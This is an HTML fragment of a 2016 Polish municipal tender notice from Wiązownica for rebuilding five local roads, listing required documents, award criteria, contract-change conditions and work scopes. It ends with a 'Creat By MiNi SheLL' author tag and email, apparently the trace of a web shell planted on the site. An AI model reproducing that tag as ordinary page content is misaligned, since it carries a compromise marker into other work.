<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-formularz ofertowy z wykorzystaniem wzoru- załącznik nr 1;
-kosztorys ofertowy w formie uproszczonej;
-parafowany projekt umowy  - zał. nr 3,
-pełnomocnictwo w przypadku wspólnego ubiegania się o udzielenie zamówienia, zgodnie z art., 23 ust. 2 ustawy Pzp., w oryginale lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza, 
-pełnomocnictwo do podpisania dokumentów oferty, o ile prawo to nie wynika z innych dokumentów złożonych w ofercie (KRS, Informacja z CEIDG) w oryginale lub kserokopii poświadczonej za zgodność z oryginałem przez notariusza, 
-pisemne zobowiązanie podmiotów oddających do  dyspozycji wykonawcy niezbędnych 
      zasobów na okres korzystania z nich przy wykonywaniu zamówienia (jeżeli dotyczy).
-dowód wniesienia wadium (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji jakości - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany w umowie pod rygorem nieważności  muszą być dokonane w formie pisemnej.
2.	Zamawiający zgodnie z art. 144 ustawy Pzp. przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, sposobu realizacji robót budowlanych i terminu realizacji zamówienia       w przypadku wystąpienia co najmniej jednej z okoliczności:
      1) zmiany spowodowane niekorzystnymi warunkami atmosferycznymi uniemożliwiającymi prawidłowe wykonanie robót zgodnie z   dokumentacją, przepisami i obowiązującymi normami, przeprowadzenia prób i sprawdzeń, dokonywania odbiorów, tj. długotrwałe opady deszczu lub spadek temperatur powietrza, jeżeli konieczność wykonania tych prac w tym czasie nie wynikała  z okoliczności, za które wykonawca ponosi odpowiedzialność,
2) zmiany spowodowane koniecznością wykonania  zamówień (robót) dodatkowych lub zamiennych, które wstrzymują lub mają wpływ na terminową realizację przedmiotu umowy,
3) zmiany spowodowane klęskami  żywiołowymi, przez co rozumie się  zjawiska naturalne  związane z działaniem sił natury, w szczególności wyładowania atmosferyczne, silne wiatry, intensywne opady atmosferyczne, długotrwałe  upały,
4) odmowy wydania przez właściwe organy decyzji, zezwoleń, uzgodnień itp.  z przyczyn niezawionionych przez wykonawcę,
5)  zmiany spowodowane opóźnienie w stosunku do zapisów umowy w terminie przekazania  wykonawcy  terenu budowy oraz dokumentacji budowlanej, 
6) wstrzymania robót przez Zamawiającego,
7) konieczności zrealizowania przedmiotu umowy lub jego  części przy zastosowaniu odmiennych rozwiązań technicznych wskazanych w dokumentacji, a wynikających z wad dokumentacji projektowej, gdyby zastosowanie  przewidzianych w projekcie rozwiązań groziło nieterminowym lub nienależytym wykonaniem przedmiotu umowy,
8) odbiegających w sposób istotny od przyjętych w dokumentacji warunków geologicznych, geotechnicznych, hydrologicznych, wykopalisk archeologicznych, niewypałów niezinwentaryzowanych lub błędnie zainwentaryzowanych sieci, instalacji lub obiektów, które skutkować mogą  nieterminowym wykonaniem  lub nienależytym wykonaniem przedmiotu umowy,
9) z powodu działania osób trzecich uniemożliwiających wykonanie zamówienia, które to działania nie są konsekwencją winy żadnej ze stron umowy,
10) zmiana obowiązującej stawki VAT,
11) ograniczenia  zakresu robót objętych zamówieniem z jednoczesnym zmniejszeniem wynagrodzenia, jeżeli okaże się , że niektóre elementy robót będą zbędne z punktu widzenia procesu inwestycyjnego lub technologicznego, przy czym rozliczenie wyłączonych elementów robót nastąpi na podstawie   kosztorysu ofertowego wykonawcy,
12) zmiany podwykonawców, niewymienionym w ofercie, którym wykonawca powierzył wykonanie części zamówienia, jeżeli taka zmiana zostanie zaakceptowana przez zamawiającego.
13) zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com  lub www.bip.wiazownica.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica
pok. nr 42  II p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2016 godzina 09:00, miejsce: Urząd Gminy Wiązownica
37-522 Wiązownica
Sekretariat Urzędu
pok. nr 22  I p.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa drogi gminnej w miejscowości Piwoda,  dz. nr ewid. 1016  (w obrębie  Domu Kultury i Zespołu Szkół).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa drogi gminnej w miejscowości Piwoda,  dz. nr ewid. 1016  (w obrębie  Domu Kultury i Zespołu Szkół).
Zakres robót:
-mechaniczne profilowanie i zagęszczanie podłoża,
-oczyszczenie warstwy konstrukcyjnej istniejącej nawierzchni,
-skropienie istniejącej nawierzchni emulsją w ilości 0,6 kg/m2,
-wyrównanie istniejącej nawierzchni z betonu asfaltowego o uziarnieniu 0/12,5 warstwa gr.2cm
-wyrównanie istniejącej nawierzchni z betonu asfaltowego o uziarnieniu 0/12,5 warstwa gr.3cm
-wykonanie podbudowy z kruszywa łamanego 0/31,5,  grubość warstwy 10 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 3 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm.
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-0, 45.23.32.00-1, 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji jakości - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa drogi gminnej w miejscowości Szówsko, dz. nr ewid. 2888, 2968, 2965/2, 2964/2, 2973/1  (ul. Wola i Wyszyńskiego).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa drogi gminnej w miejscowości Szówsko, dz. nr ewid. 2888, 2968, 2965/2, 2964/2, 2973/1  (ul. Wola i Wyszyńskiego)
Zakres robót:
-mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 5 cm.
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 7 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm.
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.
-uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-0, 45.23.32.00-1, 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji jakości - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przebudowa drogi gminnej w miejscowości Wiązownica,  dz. nr ewid. 520, 518/1, 518/2, 519/1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa drogi gminnej w miejscowości Wiązownica,  dz. nr ewid. 520, 518/1, 518/2, 519/1
Zakres robót:
-mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 5 cm.
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 7 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm.
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.
-uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-0, 45.23.32.00-1, 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji jakości - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przebudowa drogi gminnej w miejscowości Wiązownica,  dz. nr ewid. 422,400,127,91.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa drogi gminnej w miejscowości Wiązownica,  dz. nr ewid. 422,400,127,91
Zakres robót:
-mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV
-wykonanie podbudowy z kruszywa łamanego 0/31,5, grubość warstwy 5 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm.
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.
-uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-0, 45.23.32.00-1, 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji jakości - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Przebudowa drogi gminnej w miejscowości Radawa,  nr  ew. dz. 28   (Baty).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przebudowa drogi gminnej w miejscowości Radawa,  nr  ew. dz. 28   (Baty)
Zakres robót:
-mechaniczne profilowanie i zagęszczanie podłoża w gruntach kat. I-IV,
-wykonanie podbudowy z kruszywa łamanego 0/64, grubość warstwy 10 cm.
-wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/12,8 warstwa ścieralna gr. 4 cm
-ustawienie obrzeży chodnikowych o wym. 8x25 cm. na ławie betonowej (okrąg o śr. 6 m.)
-uzupełnienie poboczy kruszywem łamanym 0/31,5 gr. warstwy po zagęszczeniu 4 cm.
-uzupełnienie poboczy gruntem rodzimym śr. gr. warstwy po zagęszczeniu 5 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.20.00-0, 45.23.32.00-1, 45.23.31.20-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji jakości - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com